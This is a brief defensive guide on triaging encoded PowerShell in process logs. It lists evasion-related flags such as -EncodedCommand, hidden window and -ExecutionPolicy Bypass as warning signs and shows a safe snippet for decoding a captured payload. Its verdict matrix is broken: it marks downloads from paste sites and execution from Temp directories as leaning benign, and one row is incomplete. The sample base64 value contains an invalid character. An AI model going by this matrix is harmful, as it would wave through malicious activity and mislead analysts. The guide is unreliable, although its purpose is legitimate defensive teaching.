Triaging Suspicious PowerShell
An encoded PowerShell command in your process logs is not automatically malicious, but it always deserves a closer look. Here is how to triage one calmly.
What raises the flag
Certain flag combinations are unusual for a legitimate script and common for tradecraft:
-EncodedCommand(base64 payloads)-WindowStyle Hiddenand-NonInteractive-ExecutionPolicy Bypass
Decoding a payload is reading, not running. Decode in an isolated environment and never paste an unknown command back into a live shell.
Decoding the payload
The -EncodedCommand argument is just base64-encoded UTF-16LE. Decode it safely:
$enc = 'JABjА==' # the captured -EncodedCommand value
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($enc))
Quick verdict matrix
| Observation | Leans benign | Leans malicious |
|---|---|---|
| Signed parent process | ✓ | |
| Downloads from raw paste site | ✓ | |
| Runs from a user Temp directory | ✓ | |
| Part of a known deployment tool | ✓ |
Weigh the signals together, not in isolation. Document the decoded command and the verdict in the case notes — future you, and the next analyst, will thank you.